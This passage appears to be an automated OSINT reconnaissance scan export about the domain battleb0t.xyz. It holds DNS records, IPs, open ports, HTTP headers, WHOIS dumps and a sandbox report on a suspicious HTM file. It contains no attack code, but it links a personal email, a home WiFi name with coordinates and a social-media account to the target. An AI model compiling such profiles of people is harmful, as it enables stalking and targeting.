u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar8CD.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"35.229.48.116:80"\n "35.229.48.116:443"\n "184.31.135.120:80"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab8CC.tmp" has type "Microsoft Cabinet archive data 61745 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61745 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "Tar8CD.tmp" has type "data"- Location: [%TEMP%\\Tar8CD.tmp]- [targetUID: 00000000-00002208]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00002132]\n "77EC63BDA74BD0D0E0426DC8F8008506" has 
| 35.229.48.116 |
| 2023-05-12 03:03:43 | Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | panel.battleb0t.xyz | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://panel.battleb0t.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'UNITED STATES'], u'module': [u'US']}, u'HTTPServer': {u'string': [u'cloudflare']}, u'RedirectLocation': {u'string': [u'https://panel.battleb0t.xyz/']}, u'UncommonHeaders': {u'string': [u'report-to,nel,cf-ray,alt-svc']}, u'IP': {u'string': [u'104.21.71.14']}}}, {}] |
| 2023-05-12 03:01:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.249): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:08:54 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.71 | 34.74.170.74 |
| 2023-05-12 03:31:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 7 | 0 | None | c26pf75p2tc@networksolutionsprivateregistration.com | Domain Name: ONDIGITALOCEAN.COM
Registry Domain ID: 2280019987_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2023-04-28T07:40:26Z
Creation Date: 2018-06-27T20:51:35Z
Registry Expiry Date: 2024-06-27T20:51:35Z
Registrar: Network Solutions, LLC
Registrar IANA ID: 2
Registrar Abuse Contact Email: abuse@web.com
Registrar Abuse Contact Phone: +1.8003337680
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: KIM.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Domain Name: ONDIGITALOCEAN.COM
Registry Domain ID: 2280019987_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2023-04-28T07:41:04Z
Creation Date: 2018-06-27T20:51:35Z
Registrar Registration Expiration Date: 2024-06-27T04:00:00Z
Registrar: Network Solutions, LLC
Registrar IANA ID: 2
Reseller:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: PERFECT PRIVACY, LLC
Registrant Organization:
Registrant Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Registrant City: Jacksonville
Registrant State/Province: FL
Registrant Postal Code: 32256
Registrant Country: US
Registrant Phone: +1.5707088622
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: c26pf75p2tc@networksolutionsprivateregistration.com
Registry Admin ID:
Admin Name: PERFECT PRIVACY, LLC
Admin Organization:
Admin Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Admin City: Jacksonville
Admin State/Province: FL
Admin Postal Code: 32256
Admin Country: US
Admin Phone: +1.5707088622
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: c26pf75p2tc@networksolutionsprivateregistration.com
Registry Tech ID:
Tech Name: PERFECT PRIVACY, LLC
Tech Organization:
Tech Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Tech City: Jacksonville
Tech State/Province: FL
Tech Postal Code: 32256
Tech Country: US
Tech Phone: +1.5707088622
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: c26pf75p2tc@networksolutionsprivateregistration.com
Name Server: KIM.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Registrar Abuse Contact Email: domain.operations@web.com
Registrar Abuse Contact Phone: +1.8777228662
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:15Z <<<
For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en
|
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | alex-home (Net ID: 00:01:E3:58:87:1F) | 50.1188, 8.6843 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Picsart (Category: art)
https://picsart.com/u/ayshoo | ayshoo |
| 2023-05-12 02:44:18 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | kekw.battleb0t.xyz | |
| 2023-05-12 03:03:55 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | ebrahemsamir.github.io | 185.199.108.153 |
| 2023-05-12 03:13:03 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0001vrn.github.io]
https://www.openphish.com/feed.txt | 0001vrn.github.io |
| 2023-05-12 03:08:57 | Vulnerability - CVE Medium | Yes | Tool - Retire.js | 0 | 0 | 4 | 0 | None | CVE-2020-11022
https://nvd.nist.gov/vuln/detail/CVE-2020-11022
Score: 6.1
Description: In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. | http://code.jquery.com/jquery-3.2.1.js |
| 2023-05-12 02:44:22 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | oldfluid.battleb0t.xyz | CN=oldfluid.battleb0t.xyz |
| 2023-05-12 03:01:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.204): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:34 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c53def4fc411045-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 104.21.71.14 |
| 2023-05-12 02:44:15 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | 185.199.111.153:443 | 185.199.111.153 |
| 2023-05-12 03:09:53 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.97 |
| 2023-05-12 02:53:42 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "X_Cache_Hits": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "Via": ["1.1 varnish"], "X_Github_Request_Id": ["7C6A:7C80:2850A39:3919A91:645D8DCD"], "Age": ["1827"], "Vary": ["Accept-Encoding"], "X_Served_By": ["cache-chi-kigq8000031-CHI"], "X_Cache_Hits": ["1"], "X_Timer": ["S1683854577.750981,VS0,VE4"], "Connection": ["keep-alive"], "Etag": ["W/\"64556a8d-239b\""], "X_Fastly_Request_Id": ["01d5273de282686844c6b1cd964008c7007600d9"], "Content_Type": ["text/html; charset=utf-8"], "Date": ["<REDACTED>"], "X_Cache": ["HIT"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "Server": ["GitHub.com"], "Accept_Ranges": ["bytes"]} | 185.199.109.153 |
| 2023-05-12 02:54:12 | Linked URL - Internal | No | Web Spider | 4 | 0 | 1 | 0 | None | https://battleb0t.xyz/ | battleb0t.xyz |
| 2023-05-12 02:54:03 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 172.67.135.9:8443 | 172.67.135.9 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/ein_2.png | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:08:49 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.112 | 35.229.48.116 |
| 2023-05-12 03:00:32 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | fl@e9.lb | |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "x-powered-by": "Express", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "content-encoding": "gzip", "server": "cloudflare", "last-modified": "Tue, 01 Jan 1980 00:00:01 GMT", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=gKkAv2ueXH0GbQQgHQUB1ba%2FGC57%2Fw1l33qylJQZwo8rZZSQGe9chbhvY39IMKx8OGwCgg014ANieMLMNm0k2vb6aYv4qeDTvVzmiQmtAm9hGZFwG%2BXVyUTLjJ6w5y8UPVYOV9MG\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0", "date": "Fri, 12 May 2023 02:54:18 GMT", "cf-ray": "7c5f6051f8c478df-EWR", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "content-type": "text/html; charset=UTF-8"} |
| 2023-05-12 02:44:09 | SSL Certificate - Issued to | No | CertSpotter | 1 | 0 | 1 | 0 | None | CN=*.ayhu.xyz | ayhu.xyz |
| 2023-05-12 03:24:29 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 7 | 0 | None | Identity Digital Inc. | Domain Name: 01def.io
Registry Domain ID: e5ba8be85003487fa75e094c9481d3b7-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://www.namecheap.com/
Updated Date: 2022-06-08T05:38:27Z
Creation Date: 2022-06-03T05:37:56Z
Registry Expiry Date: 2026-06-03T05:37:56Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Capital Region
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: IS
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:12:12Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Domain name: 01def.io
Registry Domain ID: e5ba8be85003487fa75e094c9481d3b7-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2022-06-03T05:37:56.70Z
Registrar Registration Expiration Date: 2026-06-03T05:37:56.70Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T00:12:14.09Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | permissions-policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=ZnKgqHhkfhEMG0RRLEy55qXrIGT89PCJPvhlAxU1THPzwDrL5gc7PkT%2B%2FxSKq2nR5SYE1oIsFspz8pOEUKsQOZN%2FSfuF%2FMxnliSNjDjXg8QSfRLZrnIM0lr2QA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f603759cec44a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:44:27 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi2.battleb0t.xyz | CN=nwapi2.battleb0t.xyz |
| 2023-05-12 03:01:35 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.118): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:59:58 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | manuel.ebner@ebnerfamily.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 2, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'Curated Live Sessions Preview.htm', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_f98_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_f98_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_f98_ConnHashTable<3992>_HashTable_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3992"\n "IsoScope_f98_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_f98_IE_EarlyTabStart_0x9a8_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_f98_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3992"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 
0, u'type': 7, u'description': u'"185.199.108.153:80"\n "142.250.191.74:443"\n "185.199.108.153:443"\n "207.58.149.159:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"queryfibre.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ajax.googleapis.com"\n "mastermanpublications.com"\n "query.prod.cms.msn.com"\n "queryfibre.github.io"\n "teredo.ipv6.microsoft.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\program files\\internet explorer\\iexplore.exe"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df143e17619557ccd4.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet 
explorer\\recovery\\high\\active\\recoverystore.{e0e36bb7-edaf-11ed-be7c-0800275af24e}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df4659a31bf6bffa2f.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{e0e36bb9-edaf-11ed-be7c-0800275af24e}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df143e17619557ccd4.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{e0e36bb7-edaf-11ed-be7c-0800275af24e}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{e0e36bb9-edaf-11ed-be7c-0800275af24e}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df4659a31bf6bffa2f.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: 00000000-00003992]\n "slps_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: 00000000-00003992]\n "jquery.min_1_.js" has type "ASCII text with very long lines"- [targetUID: 00000000-00003992]\n "CabD0C8.tmp" has type "data"- Location: [%TEMP%\\CabD0C8.tmp]- [targetUID: 00000000-00002780]\n "splice_1_.css" has type "assembler source ASCII text 
with very long lines"- [targetUID: 00000000-00003992]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003992]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003992]\n "~DF4D711661B7A04B97.TMP" has type "data"- Location: [%TEMP%\\~DF4D711661B7A04B97.TMP]- [targetUID: 00000000-00003992]\n "~DF4E28665F3A902F14.TMP" has type "data"- Location: [%TEMP%\\~DF4E28665F3A902F14.TMP]- [targetUID: 00000000-00003992]\n "~DF143E17619557CCD4.TMP" has type "data"- Location: [%TEMP%\\~DF143E17619557CCD4.TMP]- [targetUID: 00000000-00003992]\n "~DF4659A31BF6BFFA2F.TMP" has type "data"- Location: [%TEMP%\\~DF4659A31BF6BFFA2F.TMP]- [targetUID: 00000000-00003992]\n "~DF30EEA2AB51846FC9.TMP" has type "data"- Location: [%TEMP%\\~DF30EEA2AB51846FC9.TMP]- [targetUID: 00000000-00003992]\n "_E0E36BB9-EDAF-11ED-BE7C-0800275AF24E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003992]\n "RecoveryStore._E0E36BB7-EDAF-11ED-BE7C-0800275AF24E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003992]\n "_E9939342-EDAF-11ED-BE7C-0800275AF24E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003992]\n "_9005BE62-EDB0-11ED-BE7C-0800275AF24E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003992]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00003992]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00002780]\n "4QKL12T1.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\4QKL12T1.txt]- [targetUID: 00000000-00003992]\n 
"FDR3QYMD.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FDR3QYMD.txt]- [targetUID: 00000000-00003992]\n "6JPHIXX5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6JPHIXX5.txt]- [targetUID: 00000000-00003992]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002780]\n "search_1_.json" has type "JSON data"- [targetUID: 00000000-00003992]\n "splice_1_.htm" has type "HTML document ASCII text with CRLF line terminators"- [targetUID: 00000000-00003992]\n "ZN7JGHLC.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZN7JGHLC.txt]- [targetUID: 00000000-00003992]\n "CAGRGPOL.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CAGRGPOL.txt]- [targetUID: 00000000-00003992]\n "UIT1QO2U.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\UIT1QO2U.txt]- [targetUID: 00000000-00003992]\n "W8PZ9GMH.txt" has type "ASCII 